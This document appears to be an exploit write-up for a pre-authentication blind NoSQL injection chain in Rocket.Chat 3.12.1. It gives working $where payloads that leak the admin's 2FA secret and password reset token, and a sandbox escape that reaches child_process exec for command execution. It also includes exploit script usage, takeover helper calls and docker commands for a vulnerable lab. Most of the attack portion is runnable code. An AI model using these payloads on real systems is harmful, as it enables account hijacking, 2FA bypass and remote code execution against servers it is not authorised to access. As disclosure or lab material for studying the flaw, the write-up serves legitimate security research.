Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1
1) Hijacking user's account ( Unauthenticated )
Request a password reset for the victim, recover the reset token through the pre-authentication blind NoSQL injection, and set a new password with it. The same three steps are listed under NOTE at the end of this page.
2) Privilege Escalation to admin ( Authenticated )
The admin account is most likely protected by 2FA, so even after resetting the admin's password through (1), the login prompts for a 2FA code.
The users.list API endpoint takes a query parameter that is vulnerable to NoSQL injection; it is reachable with the account hijacked in (1). Because a $where clause is evaluated as JavaScript, data can also be exfiltrated by throwing it, which reflects the value in the error response.
Run the following query to get the admin's 2FA secret: {"$where":"this.username==='admin' && (()=>{ throw this.services.totp.secret })()"}
Next, repeat (1) to reset the admin's password, and use the leaked 2FA secret to generate a valid TOTP code for the login.
Update: the admin's password reset token can be retrieved the same way as the 2FA secret: {"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}
3) RCE ( Authenticated - Admin )
```js
// Escape the script sandbox: console.log is a host-realm function, so its
// constructor is the host Function, which compiles code outside the sandbox.
const require = console.log.constructor('return process.mainModule.require')();
// With the host require in hand, load child_process and run a command.
const { exec } = require('child_process');
exec('command here');
```
Usage (-u: e-mail of the registered normal user, -a: admin e-mail, -t: target URL):
```sh
python3 exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```
Lab setup (MongoDB 3.6 as a single-node replica set, then Rocket.Chat 3.12.1 exposed on port 80):
```sh
docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
docker exec -ti db mongo --eval "printjson(rs.initiate())"
docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1
```
Then, in the running instance:
- Enable Password Policy
- Enable 2FA for Admin
- Register a normal user.
NOTE: If you set up the lab without 2FA on the Administrator, the admin account can be taken over directly:
1) Send the forgot-password mail for the admin account
2) Retrieve the admin's reset token
3) Change the password using the retrieved reset token
```py
# Admin account takeover [no 2FA]: helper functions from exploit.py
forgotpassword(adminmail, target)   # trigger the reset mail for the admin
token = resettoken(target)          # recover the token via the blind NoSQL injection
changingpassword(target, token)     # set a new admin password with it
```